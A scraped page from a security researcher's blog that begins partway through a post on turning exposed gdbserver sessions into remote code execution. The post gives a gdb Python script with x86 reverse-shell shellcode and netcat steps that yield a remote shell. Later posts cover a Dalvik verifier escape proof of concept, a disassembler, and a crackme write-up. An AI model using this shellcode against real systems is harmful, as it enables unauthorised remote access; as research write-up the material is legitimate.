classbrush: python; title: ; notranslate title>def reverse_shell((ip, port)): """Modified x86 reverse shell""" ip, port socket.inet_aton(ip), struct.pack(>H, port) sc \ 31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268 \ 000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f \ cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80 return sc.decode(hex).replace(\xff*2, port).replace(\x00*4, ip)for idx, ch in enumerate(reverse_shell(netcat)): gdb.execute(set *(unsigned char *)($eip + %d) %d % (idx, ord(ch)))gdb.execute(continue)gdb.execute(continue)/pre>/p>h2>Final Exploit/h2>p>The final exploit code can be found a hrefhttps://github.com/jbremer/gdbservrce>here/a>./p>p>Execution of the code may look like the following. We’ll need three shells.br />(Optionally on different servers – do as you like.)/p>h3>Shell 1/h3>p>pre classbrush: bash; title: ; notranslate title>$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary../pre>/p>h3>Shell 2/h3>p>pre classbrush: bash; title: ; notranslate title>$ nc -vvv -l 31338../pre>/p>h3>Shell 3/h3>p>pre classbrush: bash; title: ; notranslate title>$ vim gdbservrce.py # Patch the ip addresses$ gdb -x gdbservrce.py../pre>/p>h3>Enjoy Shell!/h3>p>Now if we go back to Shell #2, we’ll see the following, and can run arbitrarybr />shell commands./p>p>pre classbrush: bash; title: ; notranslate title>skier@box:~$ nc -vvv -l 31338Connection from 1.1.1.1 port 31338 tcp/* acceptediduid1010(skier) gid1011(skier) groups1011(skier)/pre>/p>h2>Conclusion/h2>p>This is a funny technique which basically tells you not to have gdbserver’sbr />running around img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/#respond titleComment on Turning arbitrary GDBserver sessions into RCE>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-206 --> article idpost-200 classpost-200 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/dalvik-research/ titlePermalink to Dalvik Research relbookmark>Dalvik Research/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/dalvik-research/ title12:17 pm relbookmark>time classentry-date datetime2013-10-23T12:17:41+00:00 pubdate>October 23, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/dalvik-research/#comments titleComment on Dalvik Research>2/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Dalvik Research/h1>p>Over the past couple of months I’ve been doing some research with regards tobr />the Dalvik Virtual Machine, which is Android’s Java Virtual Machinebr />implementation. Long story short, most Android applications are written inbr />Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (abr />Zip file.)/p>p>As part of my research on Dalvik, I analyzed both the Dalvik VM itself andbr />various applications – with a focus on their Obfuscation techniques (whichbr />makes analysis harder.) This research was presented on a couple ofbr />conferences./p>p>a hrefhttp://jbremer.org/automated-deobfuscation-of-android-applications/>Back in June/a> I already posted my slides for my a hrefhttp://athcon.org/>AthCon/a>br />talk, which focussed on Deobfuscation. Then a hrefhttps://twitter.com/rchiossi/status/386542792094519296>a couple of weeks ago/a>,br />I did a similar talk together with a hrefhttps://twitter.com/rchiossi>Rodrigo Chiossi/a> atbr />a hrefhttp://h2hc.com.br/h2hc/pt/>H2HC/a>, featuring new and updated content, with a bit more focus on somebr />of the techniques involved in creating new Dex files./p>p>Finally I did a a hrefhttp://2013.hack.lu/index.php/List#Jurriaan_Bremer_-_Abusing_Dalvik_Beyond_Recognition>talk/a> yesterday at a hrefhttp://2013.hack.lu/index.php/Main_Page>Hack.lu/a>, focussing on thebr />Dalvik Virtual Machine itself. In this talk I presented about anbr />em>“undocumented feature”/em> which I found in the way Android verifies Dex files,br />allowing an attacker to run arbitrary Dalvik Bytecode (which is normally notbr />allowed – all code must normally be hardcoded and will be verified uponbr />installation.) Following are the a href/wp-posts/AbusingDalvikBeyondRecognition.pdf>slides/a> and thebr />a href/wp-posts/DvmEscape.apk>Proof of Concept DvmEscape/a> application./p>p>As explained during the presentation, when running this application on yourbr />phone or emulator, you can type arbitrary Dalvik Bytecode and execute it bybr />clicking on the “Run Dalvik” button. On the 30th slide of the presentation onebr />can find two examples of valid Dalvik Bytecode, which, when ran, will returnbr />with a fancy number. Unfortunately the dalvik.py disassembler mentioned in thebr />slides is currently not open source, but for some more documentation on thebr />Dalvik Bytecode there’s always the a hrefhttp://source.android.com/devices/tech/dalvik/dalvik-bytecode.html>Dalvik Bytecode reference/a>./p>h1>Win32 Calc.exe Proof of Concept/h1>p>If you want to run my win32 calc.exe Proof of Concept from the presentationbr />you’ll have to do a couple of things:/p>ul>li>Install a href/wp-posts/CalcExe.apk>CalcExe.apk/a> on the device/li>li>Get the a href/wp-posts/adb_type.py>adb_type.py/a> script, which “types” a string intobr /> the emulator/li>li>Finally, type a href/wp-posts/payload.txt>payload.txt/a> to the em>DvmEscape/em> application, withbr /> the following command./li>/ul>p>pre classbrush: bash; title: ; notranslate title>$ python adb_type.py $(cat payload.txt) /pre>/p>p>Note that typing the bytecode in to the emulator (or phone?!) takes roughly abr />minute. (No, there appears to be no support for using the clipboard with thebr />emulator.) After that, just click on the button and calc should pop img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>p>For more information or questions, feel free to reach me at my new emailbr />address; a hrefmailto:me@jbremer.org>mail/a>./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/dalvik-research/#comments titleComment on Dalvik Research>b>2/b> Replies/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-200 --> article idpost-194 classpost-194 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/dirkjan/ titlePermalink to Dirkjan Email Feed relbookmark>Dirkjan Email Feed/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/dirkjan/ title12:23 am relbookmark>time classentry-date datetime2013-09-01T00:23:46+00:00 pubdate>September 1, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/dirkjan/#respond titleComment on Dirkjan Email Feed>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Dirkjan Strip Mailing List/h1>p>This blogpost is mainly for strong>Dutch/strong> (speaking) people (although I’llbr />still keep the blogpost in English.) As I’m sure you’re all well-aware,br />Dirkjan is an a hrefhttp://en.wikipedia.org/wiki/DirkJan>awesome/a> Dutch a hrefhttp://nl.wikipedia.org/wiki/DirkJan>comic/a>./p>p>A couple of weeks ago I stumbled upon the a hrefhttp://www.veronicamagazine.nl/entertainment/strips>weekly feed/a> from strong>Veronica/strong>.br />Naturally, not wanting to check the website every week, I came up with a verybr />simple strong>Dirkjan Feed/strong> in the shape of a Mailing List. Of course this is notbr />so much a mailing list, as it’s mostly one-way traffic, but it’s a fun way tobr />keep up-to-date with strong>two Dirkjans a week/strong>!/p>h1>Subscribe/h1>p>Having said that, one can subscribe a hrefhttp://jbremer.org/mailman/listinfo/dirkjan_jbremer.org>here/a> simply by filling outbr />the strong>email address/strong>. Other information is optional and not very interesting.br />(Yes, the website is a bit ugly – it’s the default mailing list manager.)/p>p>By subscribing you agree to being awesome (given you’re interested in readingbr />Dirkjan) and the legal disclaimer on the bottom of this blogpost./p>h1>Subscription/h1>p>As I’ve only just set up the mailing list, I do not know exactly when newbr />comics will arrive, but it looks like it will be every Tuesday. Please, strong>whenbr />subscribed/strong>, do strong>not panic/strong> – the comics will come eventually! (Justbr />strong>wait/strong>!)/p>h1>Legal stuff/h1>p>I’m not affiliated with Veronica in any way. Any damage done through thisbr />Dirkjan Email Feed is at your own responsibility. I do not intendbr />to damage Veronica in any way./p>p>That’s all, and have fun reading Dirkjan. Dirkjan is awesome img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/dirkjan/#respond titleComment on Dirkjan Email Feed>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-194 --> article idpost-189 classpost-189 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/darm-update-more-armv7-more-thumb/ titlePermalink to Darm Update – More ARMv7, More Thumb relbookmark>Darm Update – More ARMv7, More Thumb/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/darm-update-more-armv7-more-thumb/ title12:04 pm relbookmark>time classentry-date datetime2013-08-16T12:04:53+00:00 pubdate>August 16, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/darm-update-more-armv7-more-thumb/#respond titleComment on Darm Update – More ARMv7, More Thumb>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Darm Updates – More ARMv7, More Thumb/h1>p>Darm is an a hrefhttp://jbremer.org/darm>ARMv7/a> a hrefhttps://github.com/jbremer/darm>disassembler/a> in C. This blogpost is justbr />a small update about the new stuff in strong>darm/strong> from over the past couple ofbr />months, as there were some delays due to conferences and other stuff img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>h1>Thumb support/h1>p>Most notably, recently Darm has gained em>support/em> for the em>Thumb instruction/em>br />set. Those of you familiar with ARMv7 know ARMv7 has two modes, namely, ARMv7br />and Thumb. ARMv7 contains pretty much all the instructions you’d ever need,br />but Thumb is a small subset of the most used ARMv7 instructions and are onlybr />16 bits in size, whereas ARMv7 instructions are 32 bits in size. Needless tobr />say, Thumb allows for more compact code./p>p>The API to disassemble Thumb instructions is as straightforward as thebr />equivalent function for disassembling ARMv7 instructions. Furthermore, the twobr />instruction set modes share the same data structure, em>darm_t/em>, hence it isbr />easily possible to write generic analysis routines without having to worrybr />whether you’re analyzing ARMv7 or Thumb./p>p>Currently, the C API looks roughly like the following. (Including the Thumb2br />function, for more information on that, read further.)/p>p>pre classbrush: cpp; title: ; notranslate title>typedef struct _darm_t { ...} darm_t;// disassemble an armv7 instructionint darm_armv7_disasm(darm_t *d, uint32_t w);// disassemble a thumb instructionint darm_thumb_disasm(darm_t *d, uint16_t w);// disassemble a thumb2 instructionint darm_thumb2_disasm(darm_t *d, uint16_t w, uint16_t w2); /pre>/p>h1>ARMv7 Improvements and Bug Fixes/h1>p>ARMv7 has mostly had some bug fixes and a couple of new instructions. Nothingbr />too spectacular, but it’s still improving as I find bugs and stumble upon newbr />instructions./p>h1>Coming up: Thumb2 support/h1>p>Currently I’m working on getting support for the Thumb2 instruction set asbr />well. As the Thumb instruction set is fairly limited with regards to thebr />instruction that it can handle, as it’s only 16 bits in size, rather than 32br />bits, there’s also the Thumb2 extension. Thumb2 features almost all (exceptbr />for maybe a handful of instructions) of the instructions which are alsobr />available in the ARMv7 instruction set, hence allowing the optimized Thumbbr />instructions to be mixed with Thumb2 instructions, which are, as ARMv7, 32br />bits in size./p>p>Having said that, if there are requests for instructions which you’d like tobr />see sooner rather than later, please do contact me. At first I aim to support,br />let’s say, 90% of the binaries while keeping the amount of implementedbr />instructions to a “minimum.” That is, I’ll focus on the most used Thumb2br />instructions at first, and go for the complete instruction set later./p>h1>Difference between ARMv7 and Thumb/Thumb2/h1>p>A small explanation on ARMv7 vs Thumb/Thumb2./p>p>When executing ARM instructions, the instruction will be executed as ARMv7br />instruction whenever the address is 4-byte aligned, and executed as eitherbr />Thumb or Thumb2 instruction, depending on its encoding, when the lowestbr />significant bit is set. That is, when the address is not 4-byte aligned, butbr />instead either addr+1 or addr+3 (with addr being a 4-byte aligned pointer),br />then the instruction is decoded as being either Thumb or Thumb2./p>p>The instruction is either decoded as Thumb or Thumb2 depending on a couple ofbr />the most significant bits. When decoded as Thumb, one 16 bit word is fetchedbr />and executed. When decoded as Thumb2, a second 16 bit word is fetched and thebr />instruction is decoded as if it were a 32 bit word./p>p>At the a hrefhttps://github.com/jbremer/darm/blob/f43765295cc560727bc8edeb911c80a04d254e92/thumb.c#L311>following lines of code/a> we can see the comparison of thebr />upper 5 bits of the first 16 bit word. When the upper five bits equal eitherbr />b11101 (binary 11101, or 29 in decimal), b11110, or b11111, then it is abr />Thumb2 instruction. Otherwise it’s a Thumb instruction./p>p>Also note that at the moment there are two seperate functions to disassemblebr />Thumb and Thumb2 instructions, but don’t worry, in the future there’ll be abr />nice wrapper around them img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p>h1>Contact/h1>p>For questions etc, you know a hrefhttps://twitter.com/skier_t>where/a> to a hrefmailto:jurriaanbremer@gmail.com>find me/a>./p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/darm-update-more-armv7-more-thumb/#respond titleComment on Darm Update – More ARMv7, More Thumb>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-189 --> article idpost-185 classpost-185 post type-post status-publish format-standard hentry category-uncategorized> header classentry-header> h1 classentry-title>a hrefhttps://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/ titlePermalink to Solving ZCrackme#2: A Custom Emulator Approach relbookmark>Solving ZCrackme#2: A Custom Emulator Approach/a>/h1> div classentry-meta> span classsep>Posted on /span>a hrefhttps://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/ title12:16 pm relbookmark>time classentry-date datetime2013-08-07T12:16:51+00:00 pubdate>August 7, 2013/time>/a>span classby-author> span classsep> by /span> span classauthor vcard>a classurl fn n hrefhttps://jbremer.org/author/jbremer/ titleView all posts by jbremer relauthor>jbremer/a>/span>/span> /div>!-- .entry-meta --> div classcomments-link> a hrefhttps://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/#respond titleComment on Solving ZCrackme#2: A Custom Emulator Approach>span classleave-reply>Reply/span>/a> /div> /header>!-- .entry-header --> div classentry-content> style>li p { margin: 0; padding: 0;}/* undo stupid brs by wordpress */br { display: none;}/style>h1>Solving ZCrackme#2: A Custom Emulator Approach/h1>p>Due to my non-existent experience with using gdb under ARMv7, I decided tobr />solve this challenge (the a hrefhttp://blog.zimperium.com/arm-crackme-competition/>ZCrackme #2 Challenge/a>) using a a hrefhttps://github.com/jbremer/darmu>minimalbr />ARMv7 emulator/a> based on my a hrefhttps://github.com/jbremer/darm>ARMv7 disassembler/a>. (The originalbr />challenge can be found a href/wp-posts/zcrackme-orig>here/a>.)/p>h2>ZCrackme#2 Challenge/h2>p>The binary itself is fairly interesting. It has a similar structure as thebr />first ZCrackme challenge (not sure if there’s a blogpost about this onebr />though.) Basically the ELF header is messed up, sections are missing, and thebr />Entry Point points to a page filled with zeroes./p>h2>INIT_ARRAY/h2>p>Upon further inspection, using em>readelf -a zcrackme2/em>, we find that the binarybr />features the so-called em>preinit-array/em>, em>init-array/em>, and em>fini-array/em> dynamicbr />sections. These dynamic sections in fact represent a table of functionbr />addresses which are being called right before calling the real Entrybr />Point (in the case of em>preinit-array/em> and em>init-array/em>) and called afterbr />calling the real Entry Point (in the case of em>fini-array/em>.)/p>p>Looking up the various virtual offsets using IDA Pro, we find that only thebr />em>init-array/em> points to a real address, em>loc_B0D8/em>. (The other table arrays,br />em>preinit-array/em> and em>fini-array/em>, are filled with zeroes and -1′s, which arebr />nops – as in, these are not really called.)/p>p>We conclude that the actual entry point, or, the code that will be executedbr />first, is located at this (strong>loc_B0D8/strong>) address. From analyzing this routinebr />in IDA Pro, we seebr />some sort of decryption loop which overwrites some memory. Finally, afterbr />executing said decryption loop, an interesting system call is performed,br />namely #0xf0002. We find that this system call representsbr />a hrefhttps://code.google.com/p/android/issues/detail?id1803>__clear_cache/a>./p>h2>__clear_cache/h2>p>Basically, before the decrypted code can be executed, the code cache first hasbr />to be cleared for the particular address range in order to make sure that,br />when it is being executed, the new code will be executed, rather than anybr />remaining code in the cache./p>p>Similar tricks to this (decrypting code and clearing the cache) are performedbr />a total of five times in this crackme./p>p>So, having cleared the cache, the execution flow of the crackme now ends up inbr />the decrypted code. Which, in turn, does some more rounds of decryption./p>h2>Code Decryption/h2>p>As mentioned, the crackme overwrites memory of the ELF file a total of fivebr />times. One of these “decryptions” in fact zeroes the first 100 bytes of thebr />ELF header. As our goal is to dump a decrypted version of the crackme binary,br />this ELF header corruption does not help us (as IDA Pro wouldn’t understandbr />the binary anymore.)/p>h2>Reconstructing a Decrypted Binary/h2>p>As decryption is being followed by clearing the cache each time, we dump a newbr />binary during each time the cache is cleared. We do this by em>applying/em> thebr />changes to a copy of the original binary. That is, read the decrypted databr />from emulator memory, and overwriting it to our original binaries buffer. Webr />do this for each decryption, except for the one iteration where the ELF headerbr />is zeroed out. (Note: the em>__clear_cache/em> system call takes the startingbr />address as first parameter and the end address as second parameter, hence itbr />is trivial for us to find out which chunks of memory have been decrypted.)/p>h2>Scripting the Emulator/h2>p>The a href/wp-posts/zcrackme.py>following script/a>, although a bit messy, represents the code to dumpbr />the binary a couple of times, which results in the final binary we’rebr />interested in. The unpacked binary can be found a href/wp-posts/zcrackme-unpacked>here/a>. (Note that thisbr />unpacked binary may be inaccurate, with regards to global variables etc thatbr />have been updated during runtime but are not reflected in this version of thebr />binary.)/p>p>Having successfully dumped the unpacked binary, it is now time for some staticbr />analysis on this binary. Do note that a hrefhttps://github.com/jbremer/darmu>our emulator/a> should run fine onbr />Windows and Linux (with a 32bit Python installed, that is.)/p>h2>The actual Crackme/h2>p>Looking through the dumped binary, we find ourselves looking at em>sub_87B4/em>,br />which is the function where the real stuff is happening (argc/argv parsing,br />that is.)/p>p>There are a couple of odd text messages which will be printed wheneverbr />incorrect information is entered on the commandline. Finally, we find somebr />interesting function calls, of which one to em>sub_8638/em>, which seems to decryptbr />the string buffer that can be found at em>byte_9C35/em>, and another function whichbr />does a custom strcmp() against the argument on the commandline./p>p>The string at em>byte_9C35/em> is decrypted by xor’ing with 0x0d (decrypted to abr />buffer on the stack by em>sub_8638/em>), resulting in thebr />string strong>ZenCracking/strong>. That said, we’ve solved the challenge../p>h2>Conclusion/h2>p>In case somebody has a working gdb for ARMv7 setup, this challenge is probablybr />pretty easy (i.e., step through the various decryption iterations, and try tobr />find the custom strcmp.) However, I had fun implementing the simple ARMv7br />emulator, which is in fact pretty tricky, with all the conditional stuff goingbr />on./p>p>Now a harder crackme? Let’s hope the next one does not involve xorbr />“encryption” :p Zimperium’s response was, however, that having gotten to thebr />xor-decryption part already shows enough knowledge and understanding of ARMv7,br />to which I agree img srchttps://jbremer.org/wp-includes/images/smilies/icon_smile.gif alt:) classwp-smiley /> /p> /div>!-- .entry-content --> footer classentry-meta> span classcat-links> span classentry-utility-prep entry-utility-prep-cat-links>Posted in/span> a hrefhttps://jbremer.org/category/uncategorized/ titleView all posts in Uncategorized relcategory tag>Uncategorized/a> /span> span classsep> | /span> span classcomments-link>a hrefhttps://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/#respond titleComment on Solving ZCrackme#2: A Custom Emulator Approach>span classleave-reply>Leave a reply/span>/a>/span> /footer>!-- #entry-meta --> /article>!-- #post-185 --> nav idnav-below> h3 classassistive-text>Post navigation/h3> div classnav-previous>a hrefhttps://jbremer.org/page/2/ >span classmeta-nav>←/span> Older posts/a>/div> div classnav-next>/div> /nav>!-- #nav-above --> /div>!-- #content --> /div>!-- #primary --> div idsecondary classwidget-area rolecomplementary> aside idrecent-posts-2 classwidget widget_recent_entries> h3 classwidget-title>Recent Posts/h3> ul> li>a hrefhttps://jbremer.org/vmcloak3/ titleRevamped VMCloak 0.3>Revamped VMCloak 0.3/a>/li> li>a hrefhttps://jbremer.org/mitm/ titleTransparent MITM with Cuckoo Sandbox>Transparent MITM with Cuckoo Sandbox/a>/li> li>a hrefhttps://jbremer.org/vmcloak2/ titleVMCloak 0.2: Windows 7 Support>VMCloak 0.2: Windows 7 Support/a>/li> li>a hrefhttps://jbremer.org/vmcloak/ titleVMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox>VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox/a>/li> li>a hrefhttps://jbremer.org/mona-101-a-global-samsung-dll/ titleMona 101: a Global Samsung DLL>Mona 101: a Global Samsung DLL/a>/li> li>a hrefhttps://jbremer.org/turning-arbitrary-gdbserver-sessions-into-rce/ titleTurning arbitrary GDBserver sessions into RCE>Turning arbitrary GDBserver sessions into RCE/a>/li> li>a hrefhttps://jbremer.org/dalvik-research/ titleDalvik Research>Dalvik Research/a>/li> li>a hrefhttps://jbremer.org/dirkjan/ titleDirkjan Email Feed>Dirkjan Email Feed/a>/li> li>a hrefhttps://jbremer.org/darm-update-more-armv7-more-thumb/ titleDarm Update – More ARMv7, More Thumb>Darm Update – More ARMv7, More Thumb/a>/li> li>a hrefhttps://jbremer.org/solving-zcrackme2-a-custom-emulator-approach/ titleSolving ZCrackme#2: A Custom Emulator Approach>Solving ZCrackme#2: A Custom Emulator Approach/a>/li> li>a hrefhttps://jbremer.org/automated-deobfuscation-of-android-applications/ titleAutomated Deobfuscation of Android Applications>Automated Deobfuscation of Android Applications/a>/li> li>a hrefhttps://jbremer.org/pintool-and-z3-introduction/ titlePintool and Z3 Introduction>Pintool and Z3 Introduction/a>/li> li>a hrefhttps://jbremer.org/python-source-obfuscation-using-asts/ titlePython Source Obfuscation using ASTs>Python Source Obfuscation using ASTs/a>/li> li>a hrefhttps://jbremer.org/cross-referencing-stand-alone-dalvik-bytecode/ titleCross-referencing stand-alone Dalvik Bytecode>Cross-referencing stand-alone Dalvik Bytecode/a>/li> li>a hrefhttps://jbremer.org/darm/ titleDarm – An armv7 disassembler>Darm – An armv7 disassembler/a>/li> li>a hrefhttps://jbremer.org/python-binary-extensions-for-compilers/ titlePython Binary Extensions for Compilers>Python Binary Extensions for Compilers/a>/li> li>a hrefhttps://jbremer.org/apache-log-parsing/ titleApache Log Parsing>Apache Log Parsing/a>/li> li>a hrefhttps://jbremer.org/pin-denial-of-service/ titlePin Denial of Service>Pin Denial of Service/a>/li> li>a hrefhttps://jbremer.org/malware-lu-hackgyver-challenges/ titleMalware.lu HackGyver Challenges>Malware.lu HackGyver Challenges/a>/li> li>a hrefhttps://jbremer.org/pintool-makefile/ titlePintool Makefile>Pintool Makefile/a>/li> li>a hrefhttps://jbremer.org/detecting-uninitialized-memory-read-access-bugs-using-pin-a-la-valgrind/ titleDetecting Uninitialized Memory Read Access Bugs using Pin (a la Valgrind)>Detecting Uninitialized Memory Read Access Bugs using Pin (a la Valgrind)/a>/li> li>a hrefhttps://jbremer.org/x86-api-hooking-demystified/ titlex86 API Hooking Demystified>x86 API Hooking Demystified/a>/li> li>a hrefhttps://jbremer.org/malware-unpacking-level-pintool/ titleMalware Unpacking Level: Pintool>Malware Unpacking Level: Pintool/a>/li> li>a hrefhttps://jbremer.org/context-thread-all-the-things/ titleContext Thread ALL The Things>Context Thread ALL The Things/a>/li> li>a hrefhttps://jbremer.org/abusing-forced-inline-part-2-breakpoints/ titleAbusing Forced Inline Part 2: Breakpoints>Abusing Forced Inline Part 2: Breakpoints/a>/li> li>a hrefhttps://jbremer.org/abusing-forced-inline-in-c/ titleAbusing Forced Inline in C>Abusing Forced Inline in C/a>/li> li>a hrefhttps://jbremer.org/intercepting-system-calls-on-x86_64-windows/ titleIntercepting System Calls on x86_64 Windows>Intercepting System Calls on x86_64 Windows/a>/li> li>a hrefhttps://jbremer.org/format-string-vulnerabilities/ titleFormat String Vulnerabilities>Format String Vulnerabilities/a>/li> li>a hrefhttps://jbremer.org/optimizing-algorithms/ titleOptimizing Algorithms>Optimizing Algorithms/a>/li> li>a hrefhttps://jbremer.org/xss/ titleXSS>XSS/a>/li> li>a hrefhttps://jbremer.org/hello-world/ titleHello world!>Hello world!/a>/li> /ul> /aside>aside idmeta-2 classwidget widget_meta>h3 classwidget-title>Blog/h3> ul> li>a hrefhttps://jbremer.org/wp-login.php>Log in/a>/li> li>a hrefhttps://jbremer.org/feed/ titleSyndicate this site using RSS 2.0>Entries abbr titleReally Simple Syndication>RSS/abbr>/a>/li> li>a hrefhttps://jbremer.org/comments/feed/ titleThe latest comments to all posts in RSS>Comments abbr titleReally Simple Syndication>RSS/abbr>/a>/li> li>a hrefhttp://wordpress.org/ titlePowered by WordPress, state-of-the-art semantic personal publishing platform.>WordPress.org/a>/li> /ul>/aside> /div>!-- #secondary .widget-area --> /div>!-- #main --> footer idcolophon rolecontentinfo> div idsite-generator> a hrefhttp://wordpress.org/ titleSemantic Personal Publishing Platform relgenerator>Proudly powered by WordPress/a> /div> /footer>!-- #colophon -->/div>!-- #page -->script typetext/javascript srchttps://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shCore.js?ver3.0.83c>/script>script typetext/javascript srchttps://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushBash.js?ver3.0.83c>/script>script typetext/javascript srchttps://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushCpp.js?ver3.0.83c>/script>script typetext/javascript srchttps://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPython.js?ver3.0.83c>/script>script typetext/javascript> (function(){ var corecss document.createElement(link); var themecss document.createElement(link); var corecssurl https://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shCore.css?ver3.0.83c; if ( corecss.setAttribute ) { corecss.setAttribute( rel, stylesheet ); corecss.setAttribute( type, text/css ); corecss.setAttribute( href, corecssurl ); } else { corecss.rel stylesheet; corecss.href corecssurl; } document.getElementsByTagName(head)0.insertBefore( corecss, document.getElementById(syntaxhighlighteranchor) ); var themecssurl https://jbremer.org/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/styles/shThemeDefault.css?ver3.0.83c; if ( themecss.setAttribute ) { themecss.setAttribute( rel, stylesheet ); themecss.setAttribute( type, text/css ); themecss.setAttribute( href, themecssurl ); } else { themecss.rel stylesheet; themecss.href themecssurl; } //document.getElementById(syntaxhighlighteranchor).appendChild(themecss); document.getElementsByTagName(head)0.insertBefore( themecss, document.getElementById(syntaxhighlighteranchor) ); })(); SyntaxHighlighter.config.strings.expandSource + expand source; SyntaxHighlighter.config.strings.help ?; SyntaxHighlighter.config.strings.alert SyntaxHighlighter\n\n; SyntaxHighlighter.config.strings.noBrush Can\t find brush for: ; SyntaxHighlighter.config.strings.brushNotHtmlScript Brush wasn\t configured for html-script option: ; SyntaxHighlighter.defaultspad-line-numbers true; SyntaxHighlighter.defaultstoolbar false; SyntaxHighlighter.all();/script>/body>/html>
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]